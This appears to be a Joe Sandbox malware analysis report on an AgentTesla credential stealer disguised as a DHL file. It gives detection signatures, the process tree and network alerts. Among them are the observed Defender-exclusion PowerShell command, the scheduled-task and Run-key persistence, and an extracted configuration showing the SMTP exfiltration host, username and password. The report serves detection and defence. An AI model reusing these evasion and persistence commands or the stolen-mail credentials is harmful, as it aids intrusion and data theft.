Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL_1003671162.exe

Overview

General Information

Sample name:DHL_1003671162.exe
Analysis ID:1430783
MD5:1d584d84d4965e7a0da615b32ab85f2e
SHA1:bbb9c2211444450bb34a27f1a98d778e3c96b9bb
SHA256:061087cd835abcfc3411f0ec4b15ccf80516276a356b2eedc4cb444d0dac0187
Tags:AgentTeslaDHLexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DHL_1003671162.exe (PID: 7456 cmdline: "C:\Users\user\Desktop\DHL_1003671162.exe" MD5: 1D584D84D4965E7A0DA615B32AB85F2E)
    • powershell.exe (PID: 7644 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7944 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7672 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp3999.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • DHL_1003671162.exe (PID: 7812 cmdline: "C:\Users\user\Desktop\DHL_1003671162.exe" MD5: 1D584D84D4965E7A0DA615B32AB85F2E)
  • qmUxKv.exe (PID: 7924 cmdline: C:\Users\user\AppData\Roaming\qmUxKv.exe MD5: 1D584D84D4965E7A0DA615B32AB85F2E)
    • schtasks.exe (PID: 8120 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp46C8.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • qmUxKv.exe (PID: 8168 cmdline: "C:\Users\user\AppData\Roaming\qmUxKv.exe" MD5: 1D584D84D4965E7A0DA615B32AB85F2E)
    • conhost.exe (PID: 1432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • boqXv.exe (PID: 6972 cmdline: "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe" MD5: 1D584D84D4965E7A0DA615B32AB85F2E)
    • schtasks.exe (PID: 5308 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp6C70.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • boqXv.exe (PID: 7736 cmdline: "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe" MD5: 1D584D84D4965E7A0DA615B32AB85F2E)
  • boqXv.exe (PID: 7656 cmdline: "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe" MD5: 1D584D84D4965E7A0DA615B32AB85F2E)
    • schtasks.exe (PID: 8152 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp8A0A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • boqXv.exe (PID: 7196 cmdline: "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe" MD5: 1D584D84D4965E7A0DA615B32AB85F2E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.clslk.com", "Username": "gm@clslk.com", "Password": "NUZRATHinam1978"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000B.00000002.2933168050.0000000002F64000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000006.00000002.2933834693.0000000002F32000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000010.00000002.1903974100.0000000003302000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000010.00000002.1903974100.000000000330A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000014.00000002.2933907510.00000000033C2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 33 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              7.2.qmUxKv.exe.486f5a0.7.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                7.2.qmUxKv.exe.486f5a0.7.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  7.2.qmUxKv.exe.486f5a0.7.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x31cfc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x31d6e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x31df8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x31e8a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x31ef4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x31f66:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x31ffc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x3208c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.2.DHL_1003671162.exe.3a44990.6.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    0.2.DHL_1003671162.exe.3a44990.6.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 22 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_1003671162.exe", ParentImage: C:\Users\user\Desktop\DHL_1003671162.exe, ParentProcessId: 7456, ParentProcessName: DHL_1003671162.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe", ProcessId: 7644, ProcessName: powershell.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\DHL_1003671162.exe, ProcessId: 7812, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boqXv
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_1003671162.exe", ParentImage: C:\Users\user\Desktop\DHL_1003671162.exe, ParentProcessId: 7456, ParentProcessName: DHL_1003671162.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe", ProcessId: 7644, ProcessName: powershell.exe
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp46C8.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp46C8.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\qmUxKv.exe, ParentImage: C:\Users\user\AppData\Roaming\qmUxKv.exe, ParentProcessId: 7924, ParentProcessName: qmUxKv.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp46C8.tmp", ProcessId: 8120, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Outbound SMTP Connections
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 50.87.253.239, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\DHL_1003671162.exe, Initiated: true, ProcessId: 7812, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp3999.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp3999.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_1003671162.exe", ParentImage: C:\Users\user\Desktop\DHL_1003671162.exe, ParentProcessId: 7456, ParentProcessName: DHL_1003671162.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp3999.tmp", ProcessId: 7672, ProcessName: schtasks.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_1003671162.exe", ParentImage: C:\Users\user\Desktop\DHL_1003671162.exe, ParentProcessId: 7456, ParentProcessName: DHL_1003671162.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe", ProcessId: 7644, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Sigma detected: Scheduled temp file as task from temp location
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp3999.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp3999.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_1003671162.exe", ParentImage: C:\Users\user\Desktop\DHL_1003671162.exe, ParentProcessId: 7456, ParentProcessName: DHL_1003671162.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp3999.tmp", ProcessId: 7672, ProcessName: schtasks.exe

                      Snort Signatures

                      Timestamp:04/24/24-07:15:28.935178
                      SID:2839723
                      Source Port:49738
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-07:15:34.872020
                      SID:2839723
                      Source Port:49743
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-07:15:17.806983
                      SID:2840032
                      Source Port:49736
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-07:15:17.806983
                      SID:2839723
                      Source Port:49736
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-07:15:17.806983
                      SID:2851779
                      Source Port:49736
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-07:15:15.003229
                      SID:2855542
                      Source Port:49733
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-07:15:15.003229
                      SID:2855245
                      Source Port:49733
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-07:15:34.872156
                      SID:2840032
                      Source Port:49743
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-07:15:15.003170
                      SID:2030171
                      Source Port:49733
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-07:15:28.935275
                      SID:2855542
                      Source Port:49738
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-07:15:28.935275
                      SID:2855245
                      Source Port:49738
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-07:15:28.935178
                      SID:2030171
                      Source Port:49738
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-07:15:34.872020
                      SID:2030171
                      Source Port:49743
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-07:15:17.806983
                      SID:2855542
                      Source Port:49736
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-07:15:17.806983
                      SID:2855245
                      Source Port:49736
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-07:15:34.872156
                      SID:2851779
                      Source Port:49743
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-07:15:15.003170
                      SID:2839723
                      Source Port:49733
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-07:15:28.935275
                      SID:2851779
                      Source Port:49738
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-07:15:15.003229
                      SID:2840032
                      Source Port:49733
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-07:15:17.806983
                      SID:2030171
                      Source Port:49736
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-07:15:15.003229
                      SID:2851779
                      Source Port:49733
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-07:15:34.872156
                      SID:2855542
                      Source Port:49743
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-07:15:34.872156
                      SID:2855245
                      Source Port:49743
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-07:15:28.935275
                      SID:2840032
                      Source Port:49738
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: DHL_1003671162.exeAvira: detected
                      Antivirus detection for URL or domain
                      Source: http://mail.clslk.comAvira URL Cloud: Label: malware
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeAvira: detection malicious, Label: HEUR/AGEN.1323731
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeAvira: detection malicious, Label: HEUR/AGEN.1323731
                      Found malware configuration
                      Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.clslk.com", "Username": "gm@clslk.com", "Password": "NUZRATHinam1978"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeReversingLabs: Detection: 63%
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeVirustotal: Detection: 57%Perma Link
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeReversingLabs: Detection: 63%
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeVirustotal: Detection: 57%Perma Link
                      Multi AV Scanner detection for submitted file
                      Source: DHL_1003671162.exeVirustotal: Detection: 57%Perma Link
                      Source: DHL_1003671162.exeReversingLabs: Detection: 63%
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: DHL_1003671162.exeJoe Sandbox ML: detected
                      Source: DHL_1003671162.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: DHL_1003671162.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49733 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49733 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49733 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49733 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49733 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.4:49733 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49736 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49736 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49736 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49736 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49736 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.4:49736 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49738 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49738 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49738 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49738 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49738 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.4:49738 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49743 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49743 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49743 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49743 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49743 -> 50.87.253.239:587
                      Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.4:49743 -> 50.87.253.239:587
                      Source: global trafficTCP traffic: 192.168.2.4:49733 -> 50.87.253.239:587
                      Source: Joe Sandbox ViewIP Address: 50.87.253.239 50.87.253.239
                      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                      Source: global trafficTCP traffic: 192.168.2.4:49733 -> 50.87.253.239:587
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownDNS traffic detected: queries for: mail.clslk.com
                      Source: DHL_1003671162.exe, 00000006.00000002.2933834693.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, qmUxKv.exe, 0000000B.00000002.2933168050.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp, boqXv.exe, 00000010.00000002.1903974100.000000000330A000.00000004.00000800.00020000.00000000.sdmp, boqXv.exe, 00000014.00000002.2933907510.00000000033CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.clslk.com
                      Source: DHL_1003671162.exe, 00000000.00000002.1690593567.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, qmUxKv.exe, 00000007.00000002.1728354948.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, boqXv.exe, 0000000C.00000002.1839427071.000000000361A000.00000004.00000800.00020000.00000000.sdmp, boqXv.exe, 00000011.00000002.1901714817.0000000002623000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: DHL_1003671162.exe, 00000000.00000002.1702919719.0000000006B72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
